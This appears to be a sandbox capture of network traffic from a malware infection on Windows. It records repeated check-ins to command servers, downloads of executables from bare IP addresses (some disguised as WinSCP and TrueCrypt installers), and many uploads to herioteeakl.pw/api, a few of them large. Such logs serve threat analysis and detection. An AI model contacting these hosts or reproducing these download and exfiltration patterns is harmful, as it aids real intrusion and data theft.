Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://swvietkhiwnbo.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 261
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:31:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://butqctstxgowx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 148
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:31:45 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 37
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://5.42.65.80/newrock.exe

Remote address:

5.42.65.80:80

Request

GET /newrock.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 14 Nov 2023 00:31:43 GMT
Content-Type: application/octet-stream
Content-Length: 7204352
Last-Modified: Mon, 13 Nov 2023 07:10:29 GMT
Connection: keep-alive
ETag: "6551cbe5-6dee00"
Accept-Ranges: bytes
DNS

190.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.92.42.5.in-addr.arpa

IN PTR

Response

190.92.42.5.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
GET

http://194.49.94.72/1.exe

Remote address:

194.49.94.72:80

Request

GET /1.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.49.94.72

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:46 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Mon, 13 Nov 2023 14:22:32 GMT
ETag: "f42c00-60a09669c7f57"
Accept-Ranges: bytes
Content-Length: 16002048
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

72.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.94.49.194.in-addr.arpa

IN PTR

Response
POST

http://194.49.94.11/

A610.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 194.49.94.11
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 14 Nov 2023 00:31:48 GMT
POST

http://194.49.94.11/

A610.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 194.49.94.11
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 14 Nov 2023 00:31:53 GMT
POST

http://194.49.94.11/

A610.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 194.49.94.11
Content-Length: 791664
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 14 Nov 2023 00:32:00 GMT
POST

http://194.49.94.11/

A610.exe

Remote address:

194.49.94.11:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 194.49.94.11
Content-Length: 791656
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Tue, 14 Nov 2023 00:32:00 GMT
DNS

11.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.94.49.194.in-addr.arpa

IN PTR

Response
DNS

api.ip.sb

A610.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31
GET

https://api.ip.sb/geoip

A610.exe

Remote address:

172.67.75.172:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:54 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 369
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o%2BB4sDrE583GZnuIl2uVNiotsWrsJfYZQhpD%2FdTyGjTQysldobwLA7lc9iGZkyKxc3YdNalP%2B9gqFZGLeCrW8YdeZScecoEouCKiNK6S%2FSrAK%2FgtbavrlT%2FKgg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 825b277b7c97670b-AMS
alt-svc: h3=":443"; ma=86400
DNS

172.75.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.75.67.172.in-addr.arpa

IN PTR

Response
DNS

43.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.229.111.52.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nvlfnaacpvtc.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 307
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:32:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mccykpqspqsb.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 216
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:32:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jyumfukycuubdam.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 140
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:32:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ycbcfablnag.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 167
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:32:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sfdvsgqkkxgvlnh.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 318
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:32:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gupmysohiltg.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 359
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:32:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 47
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nsnsobmugdv.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 238
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:32:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://echybxetlxt.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 266
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:32:09 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 56
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://axkpgqgjwukijn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 319
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:32:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cfbfgoipfdobosdx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 192
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:32:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 53
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

235.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

235.175.169.194.in-addr.arpa

IN PTR

Response
GET

http://194.169.175.118/traffico.exe

Remote address:

194.169.175.118:80

Request

GET /traffico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.169.175.118

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:32:09 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Mon, 13 Nov 2023 18:01:40 GMT
ETag: "63a00-60a0c76477a77"
Accept-Ranges: bytes
Content-Length: 408064
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

118.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

118.175.169.194.in-addr.arpa

IN PTR

Response
GET

http://179.61.246.174/WinSCP-6.1.2-Setup.exe

Remote address:

179.61.246.174:80

Request

GET /WinSCP-6.1.2-Setup.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 179.61.246.174

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Tue, 14 Nov 2023 00:32:09 GMT
Content-Type: application/octet-stream
Content-Length: 471040
Last-Modified: Mon, 13 Nov 2023 10:30:21 GMT
Connection: keep-alive
ETag: "6551fabd-73000"
Accept-Ranges: bytes
DNS

174.246.61.179.in-addr.arpa

Remote address:

8.8.8.8:53

Request

174.246.61.179.in-addr.arpa

IN PTR

Response
GET

http://194.49.94.120/TrueCrypt_KSfcnd.exe

Remote address:

194.49.94.120:80

Request

GET /TrueCrypt_KSfcnd.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.49.94.120

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:32:10 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Mon, 13 Nov 2023 21:42:01 GMT
ETag: "1180400-60a0f8a523bad"
Accept-Ranges: bytes
Content-Length: 18351104
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

120.94.49.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

120.94.49.194.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.190/fks/index.php

Remote address:

5.42.92.190:80

Request

POST /fks/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://seoaayrhjdq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 313
Host: 5.42.92.190

Response

HTTP/1.1 404 Not Found

Date: Tue, 14 Nov 2023 00:32:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 412
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

8ead1c54-d881-4870-8829-8da97d840992.uuid.theupdatetime.org

Remote address:

8.8.8.8:53

Request

8ead1c54-d881-4870-8829-8da97d840992.uuid.theupdatetime.org

IN TXT

Response
DNS

host-file-host6.com

Remote address:

8.8.8.8:53

Request

host-file-host6.com

IN A

Response
DNS

host-host-file8.com

Remote address:

8.8.8.8:53

Request

host-host-file8.com

IN A

Response

host-host-file8.com

IN A

95.214.26.28
POST

http://host-host-file8.com/

Remote address:

95.214.26.28:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rjhjgbaje.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 191
Host: host-host-file8.com

Response

HTTP/1.1 200 OK

Server: nginx/1.20.2
Date: Tue, 14 Nov 2023 00:32:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
DNS

28.26.214.95.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.26.214.95.in-addr.arpa

IN PTR

Response
DNS

16.205.10.195.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.205.10.195.in-addr.arpa

IN PTR

Response
DNS

25.73.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

25.73.42.20.in-addr.arpa

IN PTR

Response
DNS

25.73.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

25.73.42.20.in-addr.arpa

IN PTR

Response
DNS

server15.theupdatetime.org

Remote address:

8.8.8.8:53

Request

server15.theupdatetime.org

IN A

Response

server15.theupdatetime.org

IN A

185.82.216.108
DNS

server15.theupdatetime.org

Remote address:

8.8.8.8:53

Request

server15.theupdatetime.org

IN A

Response

server15.theupdatetime.org

IN A

185.82.216.108
DNS

cdn.discordapp.com

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.133.233
DNS

cdn.discordapp.com

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.133.233
DNS

stun.sipgate.net

Remote address:

8.8.8.8:53

Request

stun.sipgate.net

IN A

Response

stun.sipgate.net

IN CNAME

stun.sipgate.cloud

stun.sipgate.cloud

IN CNAME

a6adcb4b9bf816abe.awsglobalaccelerator.com

a6adcb4b9bf816abe.awsglobalaccelerator.com

IN A

15.197.250.192

a6adcb4b9bf816abe.awsglobalaccelerator.com

IN A

3.33.249.248
DNS

walkinglate.com

Remote address:

8.8.8.8:53

Request

walkinglate.com

IN A

Response

walkinglate.com

IN A

188.114.97.0

walkinglate.com

IN A

188.114.96.0
DNS

walkinglate.com

Remote address:

8.8.8.8:53

Request

walkinglate.com

IN A

Response

walkinglate.com

IN A

188.114.97.0

walkinglate.com

IN A

188.114.96.0
DNS

192.250.197.15.in-addr.arpa

Remote address:

8.8.8.8:53

Request

192.250.197.15.in-addr.arpa

IN PTR

Response

192.250.197.15.in-addr.arpa

IN PTR

a6adcb4b9bf816abeawsglobalacceleratorcom
DNS

192.250.197.15.in-addr.arpa

Remote address:

8.8.8.8:53

Request

192.250.197.15.in-addr.arpa

IN PTR

Response

192.250.197.15.in-addr.arpa

IN PTR

a6adcb4b9bf816abeawsglobalacceleratorcom
DNS

233.134.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.134.159.162.in-addr.arpa

IN PTR

Response
DNS

233.134.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.134.159.162.in-addr.arpa

IN PTR

Response
DNS

108.216.82.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.216.82.185.in-addr.arpa

IN PTR

Response

108.216.82.185.in-addr.arpa

IN PTR

dedic-mariadebommarez-1201693hosted-by-itldccom
DNS

108.216.82.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.216.82.185.in-addr.arpa

IN PTR

Response

108.216.82.185.in-addr.arpa

IN PTR

dedic-mariadebommarez-1201693hosted-by-itldccom
DNS

0.97.114.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.97.114.188.in-addr.arpa

IN PTR

Response

5.42.92.51:19057

AppLaunch.exe

260 B
5
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301478_1ATXLTSLM5UX4ZJYP&pid=21.2&w=1080&h=1920&c=4

tls, http2

94.3kB
2.5MB
1791
1784

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301370_1WTDA3QMJSZ92RY3W&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301045_1V3F59LO4JDHHM1AD&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317300947_1GOYB38DJXHYRW08B&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301380_1RKU3AKJ11J41126R&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317300937_1HHU6SR72RIO6JU61&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301478_1ATXLTSLM5UX4ZJYP&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.3kB
16
14
5.42.92.51:19057

AppLaunch.exe

260 B
5
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.5kB
2.7kB
9
9

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.2kB
18.8kB
20
18

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

30.3kB
1.7kB
27
14

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

14.1kB
1.6kB
15
11

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

18.9kB
1.8kB
19
16

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.6kB
1.3kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

2.1kB
1.3kB
7
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

401.9kB
10.4kB
292
232

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
5.42.92.51:19057

AppLaunch.exe

260 B
5
5.42.92.190:80

http://5.42.92.190/fks/index.php

http

5.5kB
103.6kB
56
90

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404
5.42.65.80:80

